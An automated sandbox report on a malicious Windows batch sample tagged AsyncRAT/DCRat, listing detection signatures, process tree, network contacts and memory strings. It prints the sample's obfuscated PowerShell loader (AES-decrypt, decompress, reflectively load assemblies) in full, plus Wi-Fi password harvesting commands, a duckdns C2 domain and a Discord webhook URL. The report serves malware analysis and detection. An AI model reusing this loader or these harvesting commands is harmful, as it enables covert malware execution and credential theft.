Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a.cmd

Overview

General Information

Sample name:a.cmd
Analysis ID:1431886
MD5:0b72d9b98a14810527f555cad408e756
SHA1:e24969bea50bebde5905068c993324fae2470ac6
SHA256:fc1c119af2b10c067771cf36170a8b4ac28db714d14cde45a96b4807d654ded5
Tags:AsyncRATcmd
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
Check if machine is in data center or colocation facility
Obfuscated command line found
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6540 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\a.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6704 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6760 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6932 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 6).Substring(2))));[System.Reflection.Assembly]::($LzXa[13])([byte[]]$eOZhb).($LzXa[8]).($LzXa[12])($null,$null);[System.Reflection.Assembly]::($LzXa[13])([byte[]]$pfOyV).($LzXa[8]).($LzXa[12])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6972 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 2084 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 3020 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • netsh.exe (PID: 6204 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • findstr.exe (PID: 5888 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 4916 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 708 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • netsh.exe (PID: 6800 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_DCRat_1aeea1acunknownunknown
  • 0x5f6:$b2: DcRat By qwqdanchun1

Sigma Signatures

System Summary

barindex
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6760, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6972, ProcessName: powershell.exe

Stealing of Sensitive Information

barindex
Sigma detected: Capture Wi-Fi password
Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6972, ParentProcessName: powershell.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 2084, ProcessName: cmd.exe

Snort Signatures

Timestamp:04/25/24-22:45:11.789646
SID:2848152
Source Port:3232
Destination Port:49730
Protocol:TCP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: Binary string: 9.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000008.00000002.1736352605.000001D03983A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1736352605.000001D039806000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbOLtu source: powershell.exe, 00000008.00000002.1737721152.000001D039BA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbU source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbg source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1736352605.000001D03983A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbE source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.1737175826.000001D039B20000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 91.92.249.117:3232 -> 192.168.2.4:49730
Uses dynamic DNS services
Source: unknownDNS query: name: dcxwq1.duckdns.org
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 91.92.249.117:3232
Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox ViewIP Address: 104.21.44.66 104.21.44.66
Source: Joe Sandbox ViewASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: icanhazip.com
Source: unknownDNS query: name: icanhazip.com
Source: unknownDNS query: name: ip-api.com
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global trafficDNS traffic detected: DNS query: dcxwq1.duckdns.org
Source: global trafficDNS traffic detected: DNS query: icanhazip.com
Source: global trafficDNS traffic detected: DNS query: 27.58.7.0.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: ip-api.com
Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000008.00000002.1717054429.000001D021BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D031993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.1717054429.000001D023364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1736124764.000001D0397D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1717054429.000001D0217D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.1717054429.000001D023364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1736124764.000001D0397D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000008.00000002.1717054429.000001D0217D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: ce3ed400-d1e84918ad678b08d2a369a3-Latest.log.7.drString found in binary or memory: https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000008.00000002.1717054429.000001D023364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1736124764.000001D0397D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1717054429.000001D021AB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1717054429.000001D0233EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D031993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1733109212.000001D03185D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.1717054429.000001D022C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://support.mozilla.org
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: History.txt.7.dr, tmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: tmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: History.txt.7.dr, tmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: tmp5651.tmp.dat.7.dr, tmp5661.tmp.dat.7.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp5662.tmp.dat.7.dr, tmp562F.tmp.dat.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: History.txt0.7.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: tmp5692.tmp.dat.7.dr, tmp5721.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp5721.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmp5692.tmp.dat.7.dr, tmp5721.tmp.dat.7.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:49740 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Very long command line found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2153
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2153Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B886DA08_2_00007FFD9B886DA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B880E3C8_2_00007FFD9B880E3C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B88F5218_2_00007FFD9B88F521
Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: classification engineClassification label: mal100.troj.spyw.evad.winCMD@31/33@7/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\??EpuV1qGUn?l?pZ?0USFo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5blwldwa.blh.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: tmp5640.tmp.dat.7.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\a.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\a.cmd"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\a.cmd';$LzXa='RUWTCeaUWTCdLUWTCineUWTCsUWTC'.Replace('UWTC', ''),'ChZJGfangZJGfeExZJGftenZJGfsiZJGfonZJGf'.Replace('ZJGf', ''),'CAhKEreaAhKEteDAhKEeAhKEcAhKErypAhKEtorAhKE'.Replace('AhKE', ''),'FroBWNamBBWNaasBWNae6BWNa4SBWNatrBWNaiBWNangBWNa'.Replace('BWNa', ''),'DWncieWncicomWnciprWnciessWnci'.Replace('Wnci', ''),'TrOZMganOZMgsfoOZMgrmOZMgFinOZMgalOZMgBOZMgloOZMgckOZMg'.Replace('OZMg', ''),'EleFTeEmFTeEeFTeEnFTeEtAtFTeE'.Replace('FTeE', ''),'MMLMhainMLMhMoMLMhduMLMhlMLMheMLMh'.Replace('MLMh', ''),'EnWitytWityrWityyPWityoWityintWity'.Replace('Wity', ''),'CopyJeHyTyJeHoyJeH'.Replace('yJeH', ''),'SplVFEiiVFEitVFEi'.Replace('VFEi', ''),'GetHQKMCuHQKMrHQKMreHQKMntPHQKMrocHQKMeHQKMsHQKMsHQKM'.Replace('HQKM', ''),'IhYurnvohYurkehYur'.Replace('hYur', ''),'LoaEJSmdEJSm'.Replace('EJSm', '');powershell -w hidden;function kTjsA($UARpu){$rvnjY=[System.Security.Cryptography.Aes]::Create();$rvnjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$rvnjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$rvnjY.Key=[System.Convert]::($LzXa[3])('4RFBdW1/zR2QfqFXFvckJggLRbhWPlZ+NeGOFVeQyfc=');$rvnjY.IV=[System.Convert]::($LzXa[3])('/1MUg0yozSO51Z+kagFGTw==');$LixCy=$rvnjY.($LzXa[2])();$eKenk=$LixCy.($LzXa[5])($UARpu,0,$UARpu.Length);$LixCy.Dispose();$rvnjY.Dispose();$eKenk;}function znPjO($UARpu){$WVzHv=New-Object System.IO.MemoryStream(,$UARpu);$OjCYY=New-Object System.IO.MemoryStream;$vQDXk=New-Object System.IO.Compression.GZipStream($WVzHv,[IO.Compression.CompressionMode]::($LzXa[4]));$vQDXk.($LzXa[9])($OjCYY);$vQDXk.Dispose();$WVzHv.Dispose();$OjCYY.Dispose();$OjCYY.ToArray();}$PzMvs=[System.IO.File]::($LzXa[0])([Console]::Title);$pfOyV=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 5).Substring(2))));$eOZhb=znPjO (kTjsA ([Convert]::($LzXa[3])([System.Linq.Enumerable]::($LzXa[6])($PzMvs, 